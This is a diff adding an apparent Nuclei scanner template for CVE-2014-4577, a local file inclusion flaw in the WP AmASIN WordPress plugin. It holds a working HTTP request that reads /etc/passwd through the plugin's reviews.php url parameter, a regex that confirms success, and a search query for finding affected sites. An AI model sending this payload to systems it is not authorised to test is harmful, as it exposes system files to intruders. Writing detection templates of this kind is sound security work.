Create CVE-2014-4577.yaml

http/cves/2014/CVE-2014-4577.yaml

@@ -0,0 +1,44 @@
+id: CVE-2014-4577
+
+info:
+  name: WP AmASIN – The Amazon Affiliate Shop - Local File Inclusion
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Absolute path traversal vulnerability in reviews.php in the WP AmASIN - The Amazon Affiliate Shop plugin 0.9.6 and earlier for WordPress allows remote attackers to read arbitrary files via a full pathname in the url parameter.
+  reference:
+    - https://codevigilant.com/disclosure/wp-plugin-wp-amasin-the-amazon-affiliate-shop-local-file-inclusion/
+    - https://wpscan.com/plugin/wp-amasin-the-amazon-affiliate-shop/
+    - https://github.com/superlink996/chunqiuyunjingbachang
+  classification:
+    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
+    cvss-score: 5
+    cve-id: CVE-2014-4577
+    cwe-id: CWE-22
+    epss-score: 0.00847
+    epss-percentile: 0.82512
+    cpe: cpe:2.3:a:websupporter:wp_amasin_-_the_amazon_affiliate_shop:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    vendor: websupporter
+    product: wp_amasin_-_the_amazon_affiliate_shop
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/"
+  tags: cve,cve2014,wordpress,wpscan,wp-plugin,lfi,wp,wp-amasin-the-amazon-affiliate-shop
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200